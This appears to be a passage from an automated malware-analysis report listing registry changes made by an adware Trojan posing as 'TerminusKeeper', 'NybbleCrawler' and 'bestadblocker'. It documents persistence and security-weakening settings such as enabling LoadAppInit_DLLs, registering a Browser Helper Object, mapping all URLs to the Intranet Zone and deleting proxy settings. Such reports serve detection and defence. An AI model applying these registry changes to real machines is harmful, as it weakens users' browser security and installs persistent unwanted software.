[HKLM\SOFTWARE\{12DA0E6F-5543-440C-BAA2-28BF01070AFA}\_daaabfc6]
"Mode" = "4026531840"

[HKLM\SOFTWARE\{12DA0E6F-5543-440C-BAA2-28BF01070AFA}\_daaabfc6\eae10f9d]
"340d3099" = "/P////%%"

[HKCU\Software\AppDataLow\{12DA0E6F-5543-440C-BAA2-28BF01070AFA}\_daaabfc6\eae10f9d]
"c99a5f5c" = "///%"

[HKLM\SOFTWARE\{12DA0E6F-5543-440C-BAA2-28BF01070AFA}\_daaabfc6\eae10f9d]
"2e22d94e" = "///%"

[HKLM\SOFTWARE\{12A61307-94CD-4F8E-94BC-918E511FAA81}]
"n" = "1"

[HKLM\SOFTWARE\e5f1f541-cda7-09cd-83cb-a28a05c4e59a\65211815278982610\eae10f9d]
"7f69fa1f" = "///%"

[HKCU\Software\AppDataLow\{12DA0E6F-5543-440C-BAA2-28BF01070AFA}\_daaabfc6\eae10f9d]
"414bc593" = "///%"

[HKLM\SOFTWARE\{12DA0E6F-5543-440C-BAA2-28BF01070AFA}\_daaabfc6\eae10f9d]
"060df2cd" = "c/Au/XV/H/Ap/X2/GP/j/Xt/axAv/X6////%"
"f1f24e29" = "Vl/l/C/////%"

[HKLM\SOFTWARE\e5f1f541-cda7-09cd-83cb-a28a05c4e59a\65211815278982610\eae10f9d]
"7367429f" = "///%"

[HKLM\SOFTWARE\e5f1f541-cda7-09cd-83cb-a28a05c4e59a\65211815278982610\00000000]
"370856c7" = ""

[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Windows]
"LoadAppInit_DLLs" = "1"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path4]
"CacheLimit" = "65452"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Connections]
"SavedLegacySettings" = "3C 00 00 00 22 00 00 00 01 00 00 00 00 00 00 00"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{12DA0E6F-5543-440C-BAA2-28BF01070AFA}{daaabfc6}]
"QuietUninstallString" = "%System%\RUNDLL32.EXE C:\PROGRA~1\TERMIN~1\TERMIN~1.DLL,_uninstall /un /uq"

[HKCU\Software\AppDataLow\{12DA0E6F-5543-440C-BAA2-28BF01070AFA}\_daaabfc6\eae10f9d]
"e46c271e" = "///%"

[HKLM\SOFTWARE\{12DA0E6F-5543-440C-BAA2-28BF01070AFA}\_daaabfc6\00000000]
"a47da861" = "o01O07x0m00K02E0aU1e0700m01 0640ml1e06I0al1T0780pU0T07t0nl1D06I0mU1O0640n01Y02E0, o01O07x0m00K02E0aU1e0700m01e0780px0S06E0ml1B02E0ix1S06h0nl1N07x0qx1Y06U0aU0%, o01O07x0m00K02E0aU1W06t0i01A0780px1 02I0nU1M06m0aU1P06I0ox1S07b0i01e06U0n00T00%%, o01O07x0m00K02E0aU1Y06h0ql1M0640ml1J07b0qx1A06t0al1T0780pU0T07t0nl1D06I0mU1O0640n01Y02E0, o01O07x0m00K02E0aU1A0640qU1O06E0ml1J06m0nU1T06x0al1g06E0nx0T07t0nl1D06I0mU1O0640n01Y02E0, o01O07x0m00K02E0aU1A0640qU1O06E0ml1J06m0nU1T06x0al1T0780pU0T07t0nl1D06I0mU1O0640n01Y02E0, o01O07x0m00K02E0aU1W06E0o01S07b0nx1D07x0o01N06Y0jx0S06b0nU1Z02E0ix1S06h0nl1N07x0qx1Y06U0aU0%, o01O07x0m00K02E0aU1W06E0o01S07b0nx1D07x0o01N06Y0jx0S06E0ml1B02E0ix1S06h0nl1N07x0qx1Y06U0aU0%, o01O07x0m00K02E0aU1Z0640j01D06O0ix1N07t0oU1N06Y0jx0S06b0nU1Z02E0ix1S06h0nl1N07x0qx1Y06U0aU0%, o01O07x0m00K02E0aU1Z0640j01D06O0ix1Z0640n01Y02I0nl1 07x0aU1P06I0ox1S07b0i01e06U0n00T00%%"

[HKLM\SOFTWARE\{12DA0E6F-5543-440C-BAA2-28BF01070AFA}\_daaabfc6\eae10f9d]
"3c09c42b" = "///%"
"c6c5dd44" = "V/////%%"

[HKCU\Software\AppDataLow\{12DA0E6F-5543-440C-BAA2-28BF01070AFA}\_daaabfc6\eae10f9d]
"e8f9dcc7" = "UlAr/XJ/c//k////"

[HKLM\SOFTWARE\e5f1f541-cda7-09cd-83cb-a28a05c4e59a\65211815278982610]
"usr.1" = "PC ACFabcdefABCDWY"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"History" = "%Documents and Settings%\%current user%\Local Settings\History"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path2]
"CacheLimit" = "65452"

[HKCU\Software\AppDataLow\{12DA0E6F-5543-440C-BAA2-28BF01070AFA}\_daaabfc6\eae10f9d]
"7367429f" = "///%"

[HKLM\SOFTWARE\{12DA0E6F-5543-440C-BAA2-28BF01070AFA}\_daaabfc6]
"Version" = "22022148"

[HKLM\SOFTWARE\{12DA0E6F-5543-440C-BAA2-28BF01070AFA}\_daaabfc6\00000000]
"3efeb33e" = ""

[HKLM\SOFTWARE\e5f1f541-cda7-09cd-83cb-a28a05c4e59a\65211815278982610\eae10f9d]
"e46c271e" = "///%"
"a2e3b941" = "///%"

[HKCU\Software\AppDataLow\{12DA0E6F-5543-440C-BAA2-28BF01070AFA}\_daaabfc6\eae10f9d]
"2e22d94e" = "///%"

[HKLM\SOFTWARE\e5f1f541-cda7-09cd-83cb-a28a05c4e59a\65211815278982610]
"data.0" = "ylN02cKwRmiKakztvqeQ0hbt7/5r8kXDWB6fVV0 1R9ENN03GpfkHf8ccg6pVYI75JoJxLo1KGh0BHsbVNkv7mJ2 ECnxzqE12"
"data.1" = "dqDqm3me uMixabcdeYKgxSiir/DCzlUaJ9i2FEpFRQ/8peP02yw6ELFkW/NhrmAaM nVTGJ7dZOaSfxYRigEi7Ow8MFvlLO61f5ZrQtpiALT6jgebbiyQQyOZ4sMdtchi"

[HKCU\Software\AppDataLow\{12DA0E6F-5543-440C-BAA2-28BF01070AFA}\_daaabfc6\eae10f9d]
"f1f24e29" = "Vl/l/C/////%"

[HKLM\SOFTWARE\e5f1f541-cda7-09cd-83cb-a28a05c4e59a\65211815278982610\eae10f9d]
"a0743acc" = "N/////%%"
"a1dcff5b" = "V/////%%"
"8b9e4cbc" = "V/////%%"

[HKLM\SOFTWARE\{12DA0E6F-5543-440C-BAA2-28BF01070AFA}\_daaabfc6\eae10f9d]
"7f69fa1f" = "///%"

[HKLM\SOFTWARE\e5f1f541-cda7-09cd-83cb-a28a05c4e59a\65211815278982610\eae10f9d]
"27ddcf6f" = "///%"

[HKLM\SOFTWARE\{12A61307-94CD-4F8E-94BC-918E511FAA81}]
"daaabfc6" = "%Program Files%\TerminusKeeper\TerminusKeeper.dll"

[HKCU\Software\AppDataLow\{12DA0E6F-5543-440C-BAA2-28BF01070AFA}\_daaabfc6]
"Mode" = "4026531840"

[HKLM\SOFTWARE\e5f1f541-cda7-09cd-83cb-a28a05c4e59a\65211815278982610\eae10f9d]
"fe94ce1e" = "V/////%%"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{12DA0E6F-5543-440C-BAA2-28BF01070AFA}{daaabfc6}]
"UninstallString" = "%System%\RUNDLL32.EXE C:\PROGRA~1\TERMIN~1\TERMIN~1.DLL,_uninstall /un"

[HKLM\SOFTWARE\{12DA0E6F-5543-440C-BAA2-28BF01070AFA}\_daaabfc6\eae10f9d]
"27ddcf6f" = "///%"

[HKLM\SOFTWARE\{12DA0E6F-5543-440C-BAA2-28BF01070AFA}\_daaabfc6]
"usr.0" = "6HJ35AXZTVNPRJLFHw"

[HKLM\SOFTWARE\{12DA0E6F-5543-440C-BAA2-28BF01070AFA}\_daaabfc6\eae10f9d]
"bbf88800" = "///%"

[HKLM\SOFTWARE\{12DA0E6F-5543-440C-BAA2-28BF01070AFA}\_daaabfc6]
"uuid" = "8738532578695851691"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{12DA0E6F-5543-440C-BAA2-28BF01070AFA}{daaabfc6}]
"NoModify" = "1"

[HKLM\SOFTWARE\e5f1f541-cda7-09cd-83cb-a28a05c4e59a\65211815278982610\eae10f9d]
"48bd1aff" = "V/////%%"

[HKCU\Software\AppDataLow\{12DA0E6F-5543-440C-BAA2-28BF01070AFA}\_daaabfc6\eae10f9d]
"d1abcdb6" = "///%"

[HKLM\SOFTWARE\e5f1f541-cda7-09cd-83cb-a28a05c4e59a\65211815278982610\eae10f9d]
"0c230bcb" = "///%"

[HKLM\SOFTWARE\{12DA0E6F-5543-440C-BAA2-28BF01070AFA}\_daaabfc6]
"Install_Dir" = "%Program Files%\TerminusKeeper"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path2]
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache2"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths]
"Paths" = "4"

[HKLM\SOFTWARE\{12DA0E6F-5543-440C-BAA2-28BF01070AFA}\_daaabfc6\eae10f9d]
"d94388d2" = "GlAk/X6/G/Ap/YV/UxAk/YZ/Gl////%%"

[HKLM\SOFTWARE\e5f1f541-cda7-09cd-83cb-a28a05c4e59a\65211815278982610]
"uuid" = "8738532578695851691"

[HKCU\Software\AppDataLow\{12DA0E6F-5543-440C-BAA2-28BF01070AFA}\_daaabfc6\eae10f9d]
"bbf88800" = "///%"

[HKLM\SOFTWARE\e5f1f541-cda7-09cd-83cb-a28a05c4e59a\65211815278982610\eae10f9d]
"c99a5f5c" = "///%"

[HKCU\Software\AppDataLow\{12DA0E6F-5543-440C-BAA2-28BF01070AFA}\_daaabfc6\eae10f9d]
"a1dcff5b" = "V/////%%"

[HKLM\SOFTWARE\{12DA0E6F-5543-440C-BAA2-28BF01070AFA}\_daaabfc6]
"data.0" = "ylN02cKwRmiKakztvqeQ0hbt7/5r8kXDWB6fVV0 1R9ENN03GpfkHf8ccg6pVYI75JoJxLo1KGh0BHsbVNkv7mJ2 ECnxzqE12"
"data.1" = "dqDqm3me uMixabcdeYKgxSiir/DCzlUaJ9i2FEpFRQ/8peP02yw6ELFkW/NhrmAaM nVTGJ7dZOaSfxYRigEi7Ow8MFvlLO61f5ZrQtpiALT6jgebbiyQQyOZ4sMdtchi"

[HKLM\SOFTWARE\{12DA0E6F-5543-440C-BAA2-28BF01070AFA}\_daaabfc6\eae10f9d]
"51d2f2ea" = "IxA3/XZ/FxAm/XJ/PlAf/XD/clAm/XJ/bx////%%"

[HKLM\SOFTWARE\{12DA0E6F-5543-440C-BAA2-28BF01070AFA}\_daaabfc6]
"State" = "0"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path1]
"CacheLimit" = "65452"

[HKLM\SOFTWARE\{12DA0E6F-5543-440C-BAA2-28BF01070AFA}\_daaabfc6\eae10f9d]
"1c311243" = "GlAk/X6/G/Ap/YV/UxAk/YZ/Gl////%%"

[HKCU\Software\AppDataLow\{12DA0E6F-5543-440C-BAA2-28BF01070AFA}\_daaabfc6\eae10f9d]
"a0743acc" = "N/////%%"

[HKLM\SOFTWARE\e5f1f541-cda7-09cd-83cb-a28a05c4e59a\65211815278982610\eae10f9d]
"587b5709" = "V/////%%"

[HKLM\SOFTWARE\e5f1f541-cda7-09cd-83cb-a28a05c4e59a\65211815278982610\00000000]
"3efeb33e" = ""

[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "3F D1 B4 B9 E4 DD C5 30 2F 5F E0 A4 BC 1C 07 0A"

[HKCU\Software\AppDataLow\{12DA0E6F-5543-440C-BAA2-28BF01070AFA}\_daaabfc6\00000000]
"370856c7" = ""

[HKLM\SOFTWARE\e5f1f541-cda7-09cd-83cb-a28a05c4e59a\65211815278982610\eae10f9d]
"bbf88800" = "///%"

[HKCU\Software\AppDataLow\{12DA0E6F-5543-440C-BAA2-28BF01070AFA}\_daaabfc6\eae10f9d]
"72758a5d" = "///%"

[HKLM\SOFTWARE\{12DA0E6F-5543-440C-BAA2-28BF01070AFA}\_daaabfc6\eae10f9d]
"8b9e4cbc" = "V/////%%"

[HKLM\SOFTWARE\e5f1f541-cda7-09cd-83cb-a28a05c4e59a\65211815278982610\eae10f9d]
"f6ad6fa6" = "V/////%%"
"c5705860" = "Vx////%%"

[HKCU\Software\AppDataLow\{12DA0E6F-5543-440C-BAA2-28BF01070AFA}\_daaabfc6\eae10f9d]
"a2e3b941" = "///%"

[HKLM\SOFTWARE\e5f1f541-cda7-09cd-83cb-a28a05c4e59a\65211815278982610\eae10f9d]
"0dc3ee96" = "/P////%%"

[HKLM\SOFTWARE\e5f1f541-cda7-09cd-83cb-a28a05c4e59a\65211815278982610\00000000]
"493c7345" = "i01 06b0o01D06I0px0S06I0px1O00%%, pl1e06b0i01T0780jx1B06E0nU1h02I0nl1 07x0"

[HKLM\SOFTWARE\e5f1f541-cda7-09cd-83cb-a28a05c4e59a\65211815278982610\eae10f9d]
"38583bc3" = "Ml/2/CF/M//g/CZ////%"

[HKCU\Software\AppDataLow\{12DA0E6F-5543-440C-BAA2-28BF01070AFA}\_daaabfc6\eae10f9d]
"0e93c3f3" = "///%"

[HKLM\SOFTWARE\e5f1f541-cda7-09cd-83cb-a28a05c4e59a\65211815278982610]
"LRTS" = "0"

[HKCU\Software\AppDataLow\{12DA0E6F-5543-440C-BAA2-28BF01070AFA}\_daaabfc6\eae10f9d]
"3c09c42b" = "///%"

[HKLM\SOFTWARE\{12DA0E6F-5543-440C-BAA2-28BF01070AFA}\_daaabfc6\eae10f9d]
"7367429f" = "///%"

[HKLM\SOFTWARE\e5f1f541-cda7-09cd-83cb-a28a05c4e59a\65211815278982610]
"svt" = "1435726521"

[HKLM\SOFTWARE\e5f1f541-cda7-09cd-83cb-a28a05c4e59a\65211815278982610]
"svx" = ""

[HKLM\SOFTWARE\{12DA0E6F-5543-440C-BAA2-28BF01070AFA}\_daaabfc6\eae10f9d]
"48bd1aff" = "V/////%%"

[HKLM\SOFTWARE\e5f1f541-cda7-09cd-83cb-a28a05c4e59a\65211815278982610]
"usr.0" = "6HJ35AXZTVNPRJLFHw"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"AppData" = "%Documents and Settings%\%current user%\Application Data"

[HKCU\Software\AppDataLow\{12DA0E6F-5543-440C-BAA2-28BF01070AFA}\_daaabfc6\eae10f9d]
"2d71d5ab" = "V/////%%"

[HKLM\SOFTWARE\e5f1f541-cda7-09cd-83cb-a28a05c4e59a\65211815278982610]
"svn" = "TerminusKeeper"

[HKCU\Software\AppDataLow\{12DA0E6F-5543-440C-BAA2-28BF01070AFA}\_daaabfc6\eae10f9d]
"7f69fa1f" = "///%"

[HKLM\SOFTWARE\e5f1f541-cda7-09cd-83cb-a28a05c4e59a\65211815278982610]
"svi" = "0"

[HKLM\SOFTWARE\{12DA0E6F-5543-440C-BAA2-28BF01070AFA}\_daaabfc6\eae10f9d]
"c24899a6" = "VP/g/CV/Vl/2/Cx////%"

[HKLM\SOFTWARE\e5f1f541-cda7-09cd-83cb-a28a05c4e59a\65211815278982610\eae10f9d]
"65114b36" = "Vl/l////"

[HKLM\SOFTWARE\{12DA0E6F-5543-440C-BAA2-28BF01070AFA}\_daaabfc6]
"dlpath" = "c:\progra~1\termin~1\termin~1.dll"

[HKLM\SOFTWARE\e5f1f541-cda7-09cd-83cb-a28a05c4e59a\65211815278982610\eae10f9d]
"e8f9dcc7" = "UlAr/XJ/c//k////"

[HKLM\SOFTWARE\e5f1f541-cda7-09cd-83cb-a28a05c4e59a\65211815278982610]
"date" = "1435726441"

[HKLM\SOFTWARE\{12DA0E6F-5543-440C-BAA2-28BF01070AFA}\_daaabfc6]
"iiid" = "1"

[HKLM\SOFTWARE\e5f1f541-cda7-09cd-83cb-a28a05c4e59a\65211815278982610\eae10f9d]
"f1f24e29" = "Vl/l/C/////%"

[HKCU\Software\AppDataLow\{12DA0E6F-5543-440C-BAA2-28BF01070AFA}\_daaabfc6]
"LRTS" = "0"

[HKLM\System\CurrentControlSet\Hardware Profiles\0001\Software\Microsoft\windows\CurrentVersion\Internet Settings]
"ProxyEnable" = "0"

[HKCU\Software\AppDataLow\{12DA0E6F-5543-440C-BAA2-28BF01070AFA}\_daaabfc6\eae10f9d]
"38583bc3" = "Ml/2/CF/M//g/CZ////%"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths]
"Directory" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5"

[HKLM\SOFTWARE\{12DA0E6F-5543-440C-BAA2-28BF01070AFA}\_daaabfc6]
"svn" = "TerminusKeeper"

[HKCU\Software\AppDataLow\{12DA0E6F-5543-440C-BAA2-28BF01070AFA}\_daaabfc6\eae10f9d]
"8b9e4cbc" = "V/////%%"

[HKLM\SOFTWARE\{12DA0E6F-5543-440C-BAA2-28BF01070AFA}\_daaabfc6\eae10f9d]
"c5705860" = "Vx////%%"

[HKLM\SOFTWARE\{12DA0E6F-5543-440C-BAA2-28BF01070AFA}\_daaabfc6]
"svi" = "0"

[HKCU\Software\AppDataLow\{12DA0E6F-5543-440C-BAA2-28BF01070AFA}\_daaabfc6]
"usr.0" = "6HJ35AXZTVNPRJLFHw"
"usr.1" = "PC ACFabcdefABCDWY"

[HKLM\SOFTWARE\{12DA0E6F-5543-440C-BAA2-28BF01070AFA}\_daaabfc6]
"svt" = "1435726521"

[HKLM\SOFTWARE\{12DA0E6F-5543-440C-BAA2-28BF01070AFA}\_daaabfc6\eae10f9d]
"f6ad6fa6" = "V/////%%"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{12DA0E6F-5543-440C-BAA2-28BF01070AFA}{daaabfc6}]
"Publisher" = "NybbleCrawler"

[HKLM\SOFTWARE\{12DA0E6F-5543-440C-BAA2-28BF01070AFA}\_daaabfc6]
"svx" = ""

[HKLM\SOFTWARE\{12DA0E6F-5543-440C-BAA2-28BF01070AFA}\_daaabfc6\eae10f9d]
"e46c271e" = "///%"

[HKCU\Software\AppDataLow\{12DA0E6F-5543-440C-BAA2-28BF01070AFA}\_daaabfc6\eae10f9d]
"1c311243" = "GlAk/X6/G/Ap/YV/UxAk/YZ/Gl////%%"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path1]
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache1"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path3]
"CacheLimit" = "65452"

[HKLM\SOFTWARE\e5f1f541-cda7-09cd-83cb-a28a05c4e59a\65211815278982610\eae10f9d]
"6185d035" = "Vx/2/Cx/V//l////"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"MigrateProxy" = "1"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{12DA0E6F-5543-440C-BAA2-28BF01070AFA}{daaabfc6}]
"DisplayName" = "NybbleCrawler"

[HKLM\SOFTWARE\e5f1f541-cda7-09cd-83cb-a28a05c4e59a\65211815278982610\eae10f9d]
"d1abcdb6" = "///%"

[HKLM\SOFTWARE\{12DA0E6F-5543-440C-BAA2-28BF01070AFA}\_daaabfc6\eae10f9d]
"1520c6f1" = "V/////%%"

[HKLM\SOFTWARE\{12DA0E6F-5543-440C-BAA2-28BF01070AFA}\_daaabfc6]
"date" = "1435726441"
"LRTS" = "0"

[HKLM\SOFTWARE\{12DA0E6F-5543-440C-BAA2-28BF01070AFA}\_daaabfc6]
"usr.1" = "PC ACFabcdefABCDWY"

[HKCU\Software\AppDataLow\{12DA0E6F-5543-440C-BAA2-28BF01070AFA}\_daaabfc6\eae10f9d]
"51d2f2ea" = "IxA3/XZ/FxAm/XJ/PlAf/XD/clAm/XJ/bx////%%"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{12DA0E6F-5543-440C-BAA2-28BF01070AFA}{daaabfc6}]
"Cache" = "9428760297565573948"

[HKLM\SOFTWARE\{12DA0E6F-5543-440C-BAA2-28BF01070AFA}\_daaabfc6\eae10f9d]
"414bc593" = "///%"

[HKLM\SOFTWARE\e5f1f541-cda7-09cd-83cb-a28a05c4e59a\65211815278982610\eae10f9d]
"c24899a6" = "VP/g/CV/Vl/2/Cx////%"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path4]
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache4"

[HKLM\SOFTWARE\e5f1f541-cda7-09cd-83cb-a28a05c4e59a\65211815278982610\eae10f9d]
"2e22d94e" = "///%"

"414bc593" = "///%"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{12DA0E6F-5543-440C-BAA2-28BF01070AFA}{daaabfc6}]
"InstallDate" = "20140701"

[HKLM\SOFTWARE\e5f1f541-cda7-09cd-83cb-a28a05c4e59a\65211815278982610]
"Mode" = "4026531840"
"iiid" = "1"

[HKCU\Software\AppDataLow\{12DA0E6F-5543-440C-BAA2-28BF01070AFA}\_daaabfc6\eae10f9d]
"65114b36" = "Vl/l////"

[HKCU\Software\AppDataLow\{12DA0E6F-5543-440C-BAA2-28BF01070AFA}\_daaabfc6]
"uuid" = "8738532578695851691"

[HKLM\SOFTWARE\e5f1f541-cda7-09cd-83cb-a28a05c4e59a\65211815278982610\eae10f9d]
"c6c5dd44" = "V/////%%"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Cache" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{12DA0E6F-5543-440C-BAA2-28BF01070AFA}{daaabfc6}]
"NoRepair" = "1"

[HKLM\SOFTWARE\{3A7D3E19-1B79-4E4E-BD96-5467DA2C4EF0}]
"n" = "1"

[HKCU\Software\AppDataLow\{12DA0E6F-5543-440C-BAA2-28BF01070AFA}\_daaabfc6\eae10f9d]
"f6ad6fa6" = "V/////%%"

[HKCU\Software\AppDataLow\{12DA0E6F-5543-440C-BAA2-28BF01070AFA}\_daaabfc6\00000000]
"3efeb33e" = ""

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Cookies" = "%Documents and Settings%\%current user%\Cookies"

[HKCU\Software\AppDataLow\{12DA0E6F-5543-440C-BAA2-28BF01070AFA}\_daaabfc6\eae10f9d]
"27ddcf6f" = "///%"

[HKLM\SOFTWARE\e5f1f541-cda7-09cd-83cb-a28a05c4e59a\65211815278982610]
"State" = "0"

[HKCU\Software\AppDataLow\{12DA0E6F-5543-440C-BAA2-28BF01070AFA}\_daaabfc6]
"date" = "1435726441"

[HKLM\SOFTWARE\e5f1f541-cda7-09cd-83cb-a28a05c4e59a\65211815278982610]
"Version" = "22022148"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path3]
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache3"

[HKCU\Software\AppDataLow\{12DA0E6F-5543-440C-BAA2-28BF01070AFA}\_daaabfc6\eae10f9d]
"1520c6f1" = "V/////%%"

[HKLM\SOFTWARE\{12DA0E6F-5543-440C-BAA2-28BF01070AFA}\_daaabfc6]
"svpath" = "c:\Program Files\TerminusKeeper\TerminusKeeper.dll"

[HKLM\SOFTWARE\{12DA0E6F-5543-440C-BAA2-28BF01070AFA}\_daaabfc6\00000000]
"493c7345" = "i01 06b0o01D06I0px0S06I0px1O00%%, pl1e06b0i01T0780jx1B06E0nU1h02I0nl1 07x0"

[HKLM\SOFTWARE\e5f1f541-cda7-09cd-83cb-a28a05c4e59a\65211815278982610\eae10f9d]
"d94388d2" = "GlAk/X6/G/Ap/YV/UxAk/YZ/Gl////%%"

Proxy settings are disabled:

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"ProxyEnable" = "0"

The Trojan modifies IE settings for security zones to map all web nodes that bypass the proxy to the Intranet Zone:

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"ProxyBypass" = "1"

The Trojan modifies IE settings for security zones to map all local web nodes with no dots, which do not refer to any zone, to the Intranet Zone:

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"UNCAsIntranet" = "1"

The Trojan modifies IE settings for security zones to map all URLs to the Intranet Zone:

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"IntranetName" = "1"

The Trojan deletes the following registry key(s):

[HKCU\Software\AppDataLow\{12DA0E6F-5543-440C-BAA2-28BF01070AFA}\_daaabfc6\eae10f9d]
[HKCU\Software\AppDataLow\{12DA0E6F-5543-440C-BAA2-28BF01070AFA}\_daaabfc6]

The Trojan deletes the following value(s) in system registry:

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"AutoConfigURL"
"ProxyServer"
"ProxyOverride"

The process rundll32.exe:1256 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:

[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "10 9A 19 6B 14 21 9D F0 2C 4E 39 6F 44 CC 42 F8"

The process rundll32.exe:1016 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:

[HKU\.DEFAULT\Software\AppDataLow\{12DA0E6F-5543-440C-BAA2-28BF01070AFA}\_daaabfc6]
"iiid" = "1"

The process regsvr32.exe:2008 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:

[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "87 87 45 DC 73 D5 F7 A8 24 75 D3 12 8E C9 97 9B"

[HKCR\TypeLib\{330ED369-73D2-49BC-AC43-1E21602F742D}\1.0\0\win32]
"(Default)" = "%Program Files%\bestadblocker\tEp7pMPAVoxXWr.tlb"

[HKCR\CLSID\{1794EDF4-AB72-4097-9564-4E9260F483B4}\VersionIndependentProgID]
"(Default)" = "P1794EDF4_AB72_4097_9564_4E9260F483B4_"

[HKCR\P1794EDF4_AB72_4097_9564_4E9260F483B4_.P1794EDF4_AB72_4097_9564_4E9260F483B4_\CurVer]
"(Default)" = "P1794EDF4_AB72_4097_9564_4E9260F483B4_.9"

[HKCR\P1794EDF4_AB72_4097_9564_4E9260F483B4_.P1794EDF4_AB72_4097_9564_4E9260F483B4_.9\CLSID]
"(Default)" = "{1794EDF4-AB72-4097-9564-4E9260F483B4}"

[HKCR\CLSID\{1794EDF4-AB72-4097-9564-4E9260F483B4}\InprocServer32]
"ThreadingModel" = "Apartment"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Ext\PreApproved\{1794EDF4-AB72-4097-9564-4E9260F483B4}]
"(Default)" = ""

[HKCR\CLSID\{1794EDF4-AB72-4097-9564-4E9260F483B4}\InprocServer32]
"(Default)" = "%Program Files%\bestadblocker\tEp7pMPAVoxXWr.dll"

[HKCR\CLSID\{1794EDF4-AB72-4097-9564-4E9260F483B4}\ProgID]
"(Default)" = "P1794EDF4_AB72_4097_9564_4E9260F483B4_.9"

[HKCR\CLSID\{1794EDF4-AB72-4097-9564-4E9260F483B4}]
"(Default)" = "bestadblocker"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\policies\Ext\CLSID]
"{1794EDF4-AB72-4097-9564-4E9260F483B4}" = "1"

[HKCR\CLSID\{1794EDF4-AB72-4097-9564-4E9260F483B4}\Programmable]
"(Default)" = ""

[HKCR\P1794EDF4_AB72_4097_9564_4E9260F483B4_.P1794EDF4_AB72_4097_9564_4E9260F483B4_]
"(Default)" = "bestadblocker"

[HKCR\P1794EDF4_AB72_4097_9564_4E9260F483B4_.P1794EDF4_AB72_4097_9564_4E9260F483B4_\CLSID]
"(Default)" = "{1794EDF4-AB72-4097-9564-4E9260F483B4}"

[HKCU\Software\Microsoft\Internet Explorer\ApprovedExtensionsMigration\{1794EDF4-AB72-4097-9564-4E9260F483B4}]
"(Default)" = ""

[HKCR\P1794EDF4_AB72_4097_9564_4E9260F483B4_.P1794EDF4_AB72_4097_9564_4E9260F483B4_.9]
"(Default)" = "bestadblocker"

It registers itself as a Browser Helper Object (BHO) to ensure its automatic execution every time Internet Explorer is run. It does this by creating the following registry key(s)/entry(ies):

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Browser Helper Objects\{1794EDF4-AB72-4097-9564-4E9260F483B4}]
"(Default)" = "bestadblocker"
"NoExplorer" = "1"

The process regsvr32.exe:1784 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:

[HKCR\Interface\{9F5974D4-08A9-4422-9F36-76103BEE67A1}\ProxyStubClsid]
"(Default)" = "{00020424-0000-0000-C000-000000000046}"

[HKCU\Software\Microsoft\Internet Explorer\ApprovedExtensionsMigration\{296EA12C-9126-48AA-AC11-7ECC0463D2B2}]
"(Default)" = ""

[HKCR\TypeLib\{330ED369-73D2-49BC-AC43-1E21602F742D}\1.0]
"(Default)" = "IEPluginLib"

[HKCR\Interface\{B0030E0C-349C-4EB5-AD5E-847B43C0D844}\TypeLib]
"(Default)" = "{330ED369-73D2-49BC-AC43-1E21602F742D}"

[HKCR\Interface\{3967CDA8-3EAB-4115-84F1-C29A9C5FB484}]
"(Default)" = "IRuntime"

[HKCR\Interface\{B0030E0C-349C-4EB5-AD5E-847B43C0D844}\ProxyStubClsid32]
"(Default)" = "{00020424-0000-0000-C000-000000000046}"

